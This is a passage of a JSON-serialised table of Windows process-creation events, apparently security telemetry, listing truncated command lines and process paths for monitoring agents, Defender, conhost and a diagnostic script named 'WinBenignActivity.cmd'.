-Fo...\",\"\\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent...\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -Fo...\",\"\\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent...\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -Fo...\",\"\\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent...\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -Fo...\",\"\\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent...\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -Fo...\",\"\\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent...\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -Fo...\",\"\\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent...\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -Fo...\",\"\\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent...\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -Fo...\",\"cmdline unknown\",\"\\\"cmd\\\"\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -Fo...\",\"cmdline unknown\",\"powershell  \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\"...\",\"ping  127.0.0.1 -n 18 \",\"svchost  \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" \\\"C...\",\"ping  127.0.0.1 -n 18 \",\"netcfg  \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" \\\"C:...\",\"ping  127.0.0.1 -n 18 \",\"cscript  \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" \\\"C...\",\"cmdline unknown\",\"\\\"CollectGuestLogs.exe\\\" -Mode:ga -FileName:C:\\\\Windo...\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -Fo...\",\"\\\"cmd\\\"\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -Fo...\",\"\\\"C:\\\\WindowsAzure\\\\SecAgent\\\\WaSecAgentProv.exe\\\" -sta...\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -Fo...\",\"\\\"CollectGuestLogs.exe\\\" -Mode:ga -FileName:C:\\\\Windo...\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -Fo...\",\"\\\"cmd\\\"\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -Fo...\",\"\\\"CollectGuestLogs.exe\\\" -Mode:ga -FileName:C:\\\\Windo...\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -Fo...\",\"\\\"cmd\\\"\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -Fo...\",\"\\\"CollectGuestLogs.exe\\\" -Mode:ga -FileName:C:\\\\Windo...\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -Fo...\",\"\\\"cmd\\\"\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -Fo...\",\"\\\"CollectGuestLogs.exe\\\" -Mode:ga -FileName:C:\\\\Windo...\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -Fo...\",\"\\\"cmd\\\"\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -Fo...\",\"\\\"CollectGuestLogs.exe\\\" -Mode:ga -FileName:C:\\\\Windo...\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -Fo...\",\"\\\"cmd\\\"\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -Fo...\",\"\\\"CollectGuestLogs.exe\\\" -Mode:ga -FileName:C:\\\\Windo...\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -Fo...\",\"\\\"cmd\\\"\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -Fo...\",\"\\\"C:\\\\WindowsAzure\\\\SecAgent\\\\WaSecAgentProv.exe\\\" -sta...\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -Fo...\",\"\\\"CollectGuestLogs.exe\\\" -Mode:ga -FileName:C:\\\\Windo...\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -Fo...\",\"\\\"cmd\\\"\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -Fo...\",\"\\\"CollectGuestLogs.exe\\\" -Mode:ga -FileName:C:\\\\Windo...\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -Fo...\",\"\\\"cmd\\\"\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -Fo...\",\"\\\"CollectGuestLogs.exe\\\" -Mode:ga -FileName:C:\\\\Windo...\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -Fo...\",\"\\\"cmd\\\"\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -Fo...\",\"\\\"CollectGuestLogs.exe\\\" -Mode:ga -FileName:C:\\\\Windo...\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -Fo...\",\"\\\"cmd\\\"\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -Fo...\",\"\\\"CollectGuestLogs.exe\\\" -Mode:ga -FileName:C:\\\\Windo...\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -Fo...\",\"\\\"cmd\\\"\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -Fo...\",\"\\\"CollectGuestLogs.exe\\\" -Mode:ga -FileName:C:\\\\Windo...\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -Fo...\",\"\\\"cmd\\\"\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -Fo...\",\"\\\"C:\\\\WindowsAzure\\\\SecAgent\\\\WaSecAgentProv.exe\\\" -sta...\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -Fo...\",\"\\\"CollectGuestLogs.exe\\\" -Mode:ga -FileName:C:\\\\Windo...\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -Fo...\",\"\\\"cmd\\\"\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -Fo...\",\"\\\"CollectGuestLogs.exe\\\" -Mode:ga -FileName:C:\\\\Windo...\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -Fo...\",\"\\\"cmd\\\"\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -Fo...\",\"\\\"CollectGuestLogs.exe\\\" -Mode:ga -FileName:C:\\\\Windo...\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -Fo...\",\"\\\"cmd\\\"\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -Fo...\",\"\\\"CollectGuestLogs.exe\\\" -Mode:ga -FileName:C:\\\\Windo...\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -Fo...\",\"\\\"cmd\\\"\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -Fo...\",\"cmdline unknown\",\"\\\"C:\\\\ProgramData\\\\Microsoft\\\\Windows Defender\\\\platfor...\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -Fo...\",\"\\\"C:\\\\ProgramData\\\\Microsoft\\\\Windows Defender\\\\platfor...\",\"\\\"C:\\\\Windows\\\\SERVIC~2\\\\NETWOR~1\\\\AppData\\\\Local\\\\Temp\\\\m...\",\"C:\\\\Windows\\\\SERVIC~2\\\\NETWOR~1\\\\AppData\\\\Local\\\\Temp\\\\90...\",\"\\\"C:\\\\ProgramData\\\\Microsoft\\\\Windows Defender\\\\platfor...\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -Fo...\",\"\\\"C:\\\\ProgramData\\\\Microsoft\\\\Windows Defender\\\\platfor...\",\"\\\"C:\\\\ProgramData\\\\Microsoft\\\\Windows Defender\\\\platfor...\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -Fo...\",\"\\\"C:\\\\ProgramData\\\\Microsoft\\\\Windows Defender\\\\platfor...\",\"\\\"C:\\\\ProgramData\\\\Microsoft\\\\Windows Defender\\\\platfor...\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -Fo...\",\"\\\"C:\\\\ProgramData\\\\Microsoft\\\\Windows Defender\\\\platfor...\",\"cmdline unknown\",\"wmiadap.exe /D /T\",\"\\\"C:\\\\Windows\\\\system32\\\\wermgr.exe\\\" \\\"-outproc\\\" \\\"0\\\" \\\"2...\",\"\\\"C:\\\\Windows\\\\system32\\\\wuauclt.exe\\\" /RunHandlerComSe...\",\"\\\"C:\\\\Windows\\\\SoftwareDistribution\\\\Download\\\\Install\\\\...\",\"C:\\\\Windows\\\\system32\\\\MpSigStub.exe /stub 1.1.15500....\",\"\\\"C:\\\\Windows\\\\system32\\\\wermgr.exe\\\" \\\"-outproc\\\" \\\"0\\\" \\\"2...\"],\"index\":[0,1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62,63,64,65,66,67,68,69,70,71,72,73,74,75,76,77,78,79,80,81,82,83,84,85,86,87,88,89,90,91,92,93,94,95,96,97,98,99,100,101,102,103,104,105,106,107,108,109,110,111,112,113,114,115,116,117,118,119,120,121,122,123,124,125,126,127,128,129,130,131,132,133,134,135,136,137,138,139,140,141,142,143,144,145,146,147,148,149,150,151,152,153,154,155,156,157,158,159,160,161,162,163,164,165,166,167,168,169,170,171,172,173,174,175,176,177,178,179,180,181,182,183,184,185,186,187,188,189,190,191,192,193,194,195,196,197,198,199,200,201,202,203,204,205,206,207,208,209,210,211,212,213,214,215,216,217,218,219,220,221,222,223,224,225,226,227,228,229,230,231,232,233,234,235,236,237,238,239,240,241,242,243,244,245,246,247,248,249,250,251,252,253,254,255,256,257,258,259,260,261,262,263,264,265,266,267,268,269,270,271,272,273,274,275,276,277,278,279,280,281,282,283,284,285,286,287,288,289,290,291,292,293,294,295,296,297,298,299,300,301,302,303,304,305,306,307,308,309,310,311,312,313,314,315,316,317,318,319,320,321,322,323,324,325,326,327,328,329,330,331,332,333,334,335,336,337,338,339,340,341,342,343,344,345,346,347,348,349,350,351,352,353,354,355,356,357,358,359,360,361,362,363,364,365,366,367,368,369,370,371,372,373,374,375,376,377,378,379,380,381,382,383,384,385,386,387,388,389,390,391,392,393,394,395,396,397,398,399,400,401,402,403,404,405,406,407,408,409,410,411,412,413,414,415,416,417,418,419,420,421,422,423,424,425,426,427,428,429,430,431,432,433,434,435,436,437,438,439,440,441,442,443,444,445,446,447,448,449,450,451,452,453,454,455,456,457,458,459,460,461,462,463,464,465,466,467,468,469,470,471,472,473,474,475,476,477,478,479,480,481,482,483,484,485,486,487,488,489,490,491,492,493,494,495,496,497,498,499,500,501,502,503,504,505,506,507,508,509,510,511,512,513,514,515,516,517,518,519,520,521,522,523,524,525,526,527,528,529,530,531,532,533,534,535,536,537,538,539,540,541,542,543,544,545,546,547,548,549,550,551,552,553,554,555,556,557,558,559,560,561,562,563,564,565,566,567,568,569,570,571,572,573,574,575,576,577,578,579,580,581,582,583,584,585,586,587,588,589,590,591,592,593,594,595,596,597,598,599,600,601,602,603,604,605,606,607,608,609,610,611,612,613,614,615,616,617,618,619,620,621,622,623,624,625,626,627,628,629,630,631,632,633,634,635,636,637,638,639,640,641,642,643,644,645,646,647,648,649,650,651,652,653,654,655,656,657,658,659,660,661,662,663,664,665,666,667,668,669,670,671,672,673,674,675,676,677,678,679,680,681,682,683,684,685,686,687,688,689,690,691,692,693,694,695,696,697,698,699,700,701,702,703,704,705,706,707,708,709,710,711,712,713,714,715,716,717,718,719,720,721,722,723,724,725,726,727,728,729,730,731,732,733,734,735,736,737,738,739,740,741,742,743,744,745,746,747,748,749,750,751,752,753,754,755,756,757,758,759,760,761,762,763,764,765,766,767,768,769,770,771,772,773,774,775,776,777,778,779,780,781,782,783,784,785,786,787,788,789,790,791,792,793,794,795,796,797,798,799,800,801,802,803,804,805,806,807,808,809,810,811,812,813,814,815,816,817,818,819,820,821,822,823,824,825,826,827,828,829,830,831,832,833,834,835,836,837,838,839,840,841,842,843,844,845,846,847,848,849,850,851,852,853,854,855,856,857,858,859,860,861,862,863,864,865,866,867,868,869,870,871,872,873,874,875,876,877,878,879,880,881,882,883,884,885,886,887,888,889,890,891,892,893,894,895,896,897,898,899,900,901,902,903,904,905,906,907,908,909,910,911,912,913,914,915,916,917,918,919,920,921,922,923,924,925,926,927,928,929,930,931,932,933,934,935,936,937,938,939,940,941,942,943,944,945,946,947,948,949,950,951,952,953,954,955,956,957,958,959,960,961,962,963,964,965,966,967,968,969,970,971,972,973,974,975,976,977,978,979,980,981,982,983,984,985,986,987,988,989,990,991,992,993,994,995,996,997,998,999,1000,1001,1002,1003,1004,1005,1006,1007,1008,1009],\"new_process_lc\":[\"c:\\\\windows\\\\system32\\\\svchost.exe\",\"c:\\\\windows\\\\system32\\\\wbem\\\\wmiprvse.exe\",\"c:\\\\windows\\\\system32\\\\wbem\\\\wmiprvse.exe\",\"c:\\\\windows\\\\system32\\\\wbem\\\\wmiprvse.exe\",\"c:\\\\windows\\\\system32\\\\dllhost.exe\",\"c:\\\\windows\\\\system32\\\\wbem\\\\wmiprvse.exe\",\"c:\\\\windows\\\\system32\\\\wbem\\\\wmiprvse.exe\",\"c:\\\\windows\\\\system32\\\\wbem\\\\wmiprvse.exe\",\"c:\\\\windows\\\\system32\\\\wbem\\\\wmiprvse.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\monitoringhost.exe\",\"c:\\\\windows\\\\system32\\\\unlodctr.exe\",\"c:\\\\windows\\\\system32\\\\conhost.exe\",\"c:\\\\windows\\\\microsoft.net\\\\framework64\\\\v4.0.30319\\\\csc.exe\",\"c:\\\\windows\\\\system32\\\\conhost.exe\",\"c:\\\\windows\\\\microsoft.net\\\\framework64\\\\v4.0.30319\\\\cvtres.exe\",\"c:\\\\windows\\\\system32\\\\lodctr.exe\",\"c:\\\\windows\\\\system32\\\\conhost.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\conhost.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\conhost.exe\",\"c:\\\\windows\\\\system32\\\\werfault.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\ict 2\\\\cmf\\\\desiredstateconfiguration\\\\dscrun.exe\",\"c:\\\\windows\\\\system32\\\\conhost.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\ict 2\\\\cmf-64\\\\desiredstateconfiguration\\\\dscrun.exe\",\"c:\\\\windows\\\\system32\\\\conhost.exe\",\"c:\\\\windows\\\\system32\\\\cscript.exe\",\"c:\\\\windows\\\\system32\\\\conhost.exe\",\"c:\\\\windows\\\\system32\\\\cscript.exe\",\"c:\\\\windows\\\\system32\\\\conhost.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\resources\\\\884\\\\pmfexe.exe\",\"c:\\\\windows\\\\system32\\\\conhost.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\monitoring host temporary files 60\\\\3490\\\\windowsosbinaries\\\\mof\\\\mofwriter.exe\",\"c:\\\\windows\\\\system32\\\\conhost.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\monitoring host temporary files 60\\\\3490\\\\windowsosbinaries\\\\dsc\\\\asmhost.exe\",\"c:\\\\windows\\\\system32\\\\conhost.exe\",\"c:\\\\windows\\\\system32\\\\secedit.exe\",\"c:\\\\windows\\\\system32\\\\secedit.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\ict 2\\\\cmf\\\\desiredstateconfiguration\\\\dscrun.exe\",\"c:\\\\windows\\\\system32\\\\conhost.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\monitoring host temporary files 60\\\\3473\\\\webbinaries\\\\microsoft.sirona.oms.security.baselineassessment.exe\",\"c:\\\\windows\\\\system32\\\\conhost.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\ict 2\\\\cmf\\\\desiredstateconfiguration\\\\dscrun.exe\",\"c:\\\\windows\\\\system32\\\\conhost.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\resources\\\\884\\\\pmfexe.exe\",\"c:\\\\windows\\\\system32\\\\conhost.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\ict 2\\\\cmf\\\\desiredstateconfiguration\\\\dscrun.exe\",\"c:\\\\windows\\\\system32\\\\conhost.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\ict 2\\\\cmf-64\\\\desiredstateconfiguration\\\\dscrun.exe\",\"c:\\\\windows\\\\system32\\\\conhost.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\ict 2\\\\cmf\\\\desiredstateconfiguration\\\\dscrun.exe\",\"c:\\\\windows\\\\system32\\\\conhost.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\resources\\\\884\\\\pmfexe.exe\",\"c:\\\\windows\\\\system32\\\\conhost.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\ict 2\\\\cmf-64\\\\desiredstateconfiguration\\\\dscrun.exe\",\"c:\\\\windows\\\\system32\\\\conhost.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\ict 2\\\\cmf\\\\desiredstateconfiguration\\\\dscrun.exe\",\"c:\\\\windows\\\\system32\\\\conhost.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\ict 2\\\\cmf\\\\desiredstateconfiguration\\\\dscrun.exe\",\"c:\\\\windows\\\\system32\\\\conhost.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\resources\\\\884\\\\pmfexe.exe\",\"c:\\\\windows\\\\system32\\\\conhost.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\ict 2\\\\cmf-64\\\\desiredstateconfiguration\\\\dscrun.exe\",\"c:\\\\windows\\\\system32\\\\conhost.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\ict 2\\\\cmf\\\\desiredstateconfiguration\\\\dscrun.exe\",\"c:\\\\windows\\\\system32\\\\conhost.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\ict 2\\\\cmf\\\\desiredstateconfiguration\\\\dscrun.exe\",\"c:\\\\windows\\\\system32\\\\conhost.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\resources\\\\884\\\\pmfexe.exe\",\"c:\\\\windows\\\\system32\\\\conhost.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\ict 2\\\\cmf-64\\\\desiredstateconfiguration\\\\dscrun.exe\",\"c:\\\\windows\\\\system32\\\\conhost.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\ict 2\\\\cmf\\\\desiredstateconfiguration\\\\dscrun.exe\",\"c:\\\\windows\\\\system32\\\\conhost.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\ict 2\\\\cmf-64\\\\desiredstateconfiguration\\\\dscrun.exe\",\"c:\\\\windows\\\\system32\\\\conhost.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\ict 2\\\\cmf\\\\desiredstateconfiguration\\\\dscrun.exe\",\"c:\\\\windows\\\\system32\\\\conhost.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\resources\\\\884\\\\pmfexe.exe\",\"c:\\\\windows\\\\system32\\\\conhost.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\ict 2\\\\cmf\\\\desiredstateconfiguration\\\\dscrun.exe\",\"c:\\\\windows\\\\system32\\\\conhost.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\ict 2\\\\cmf-64\\\\desiredstateconfiguration\\\\dscrun.exe\",\"c:\\\\windows\\\\system32\\\\conhost.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\ict 2\\\\cmf\\\\desiredstateconfiguration\\\\dscrun.exe\",\"c:\\\\windows\\\\system32\\\\conhost.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\resources\\\\884\\\\pmfexe.exe\",\"c:\\\\windows\\\\system32\\\\conhost.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\ict 2\\\\cmf\\\\desiredstateconfiguration\\\\dscrun.exe\",\"c:\\\\windows\\\\system32\\\\conhost.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\ict 2\\\\cmf-64\\\\desiredstateconfiguration\\\\dscrun.exe\",\"c:\\\\windows\\\\system32\\\\conhost.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\ict 2\\\\cmf\\\\desiredstateconfiguration\\\\dscrun.exe\",\"c:\\\\windows\\\\system32\\\\conhost.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\resources\\\\884\\\\pmfexe.exe\",\"c:\\\\windows\\\\system32\\\\conhost.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\ict 2\\\\cmf\\\\desiredstateconfiguration\\\\dscrun.exe\",\"c:\\\\windows\\\\system32\\\\conhost.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\ict 2\\\\cmf-64\\\\desiredstateconfiguration\\\\dscrun.exe\",\"c:\\\\windows\\\\system32\\\\conhost.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\ict 2\\\\cmf\\\\desiredstateconfiguration\\\\dscrun.exe\",\"c:\\\\windows\\\\system32\\\\conhost.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\resources\\\\884\\\\pmfexe.exe\",\"c:\\\\windows\\\\system32\\\\conhost.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\ict 2\\\\cmf-64\\\\desiredstateconfiguration\\\\dscrun.exe\",\"c:\\\\windows\\\\system32\\\\conhost.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\ict 2\\\\cmf\\\\desiredstateconfiguration\\\\dscrun.exe\",\"c:\\\\windows\\\\system32\\\\conhost.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\ict 2\\\\cmf\\\\desiredstateconfiguration\\\\dscrun.exe\",\"c:\\\\windows\\\\system32\\\\conhost.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\resources\\\\884\\\\pmfexe.exe\",\"c:\\\\windows\\\\system32\\\\conhost.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\ict 2\\\\cmf-64\\\\desiredstateconfiguration\\\\dscrun.exe\",\"c:\\\\windows\\\\system32\\\\conhost.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\ict 2\\\\cmf\\\\desiredstateconfiguration\\\\dscrun.exe\",\"c:\\\\windows\\\\system32\\\\conhost.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\ict 2\\\\cmf-64\\\\desiredstateconfiguration\\\\dscrun.exe\",\"c:\\\\windows\\\\system32\\\\conhost.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\ict 2\\\\cmf\\\\desiredstateconfiguration\\\\dscrun.exe\",\"c:\\\\windows\\\\system32\\\\conhost.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\resources\\\\884\\\\pmfexe.exe\",\"c:\\\\windows\\\\system32\\\\conhost.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\ict 2\\\\cmf\\\\desiredstateconfiguration\\\\dscrun.exe\",\"c:\\\\windows\\\\system32\\\\conhost.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\ict 2\\\\cmf-64\\\\desiredstateconfiguration\\\\dscrun.exe\",\"c:\\\\windows\\\\system32\\\\conhost.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\ict 2\\\\cmf\\\\desiredstateconfiguration\\\\dscrun.exe\",\"c:\\\\windows\\\\system32\\\\conhost.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\resources\\\\884\\\\pmfexe.exe\",\"c:\\\\windows\\\\system32\\\\conhost.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\ict 2\\\\cmf\\\\desiredstateconfiguration\\\\dscrun.exe\",\"c:\\\\windows\\\\system32\\\\conhost.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\ict 2\\\\cmf-64\\\\desiredstateconfiguration\\\\dscrun.exe\",\"c:\\\\windows\\\\system32\\\\conhost.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\ict 2\\\\cmf\\\\desiredstateconfiguration\\\\dscrun.exe\",\"c:\\\\windows\\\\system32\\\\conhost.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\resources\\\\884\\\\pmfexe.exe\",\"c:\\\\windows\\\\system32\\\\conhost.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\ict 2\\\\cmf-64\\\\desiredstateconfiguration\\\\dscrun.exe\",\"c:\\\\windows\\\\system32\\\\conhost.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\ict 2\\\\cmf\\\\desiredstateconfiguration\\\\dscrun.exe\",\"c:\\\\windows\\\\system32\\\\conhost.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\ict 2\\\\cmf\\\\desiredstateconfiguration\\\\dscrun.exe\",\"c:\\\\windows\\\\system32\\\\conhost.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\resources\\\\884\\\\pmfexe.exe\",\"c:\\\\windows\\\\system32\\\\conhost.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\ict 2\\\\cmf-64\\\\desiredstateconfiguration\\\\dscrun.exe\",\"c:\\\\windows\\\\system32\\\\conhost.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\ict 2\\\\cmf\\\\desiredstateconfiguration\\\\dscrun.exe\",\"c:\\\\windows\\\\system32\\\\conhost.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\ict 2\\\\cmf\\\\desiredstateconfiguration\\\\dscrun.exe\",\"c:\\\\windows\\\\system32\\\\conhost.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\resources\\\\884\\\\pmfexe.exe\",\"c:\\\\windows\\\\system32\\\\conhost.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\ict 2\\\\cmf-64\\\\desiredstateconfiguration\\\\dscrun.exe\",\"c:\\\\windows\\\\system32\\\\conhost.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\ict 2\\\\cmf\\\\desiredstateconfiguration\\\\dscrun.exe\",\"c:\\\\windows\\\\system32\\\\conhost.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\ict 2\\\\cmf-64\\\\desiredstateconfiguration\\\\dscrun.exe\",\"c:\\\\windows\\\\system32\\\\conhost.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\ict 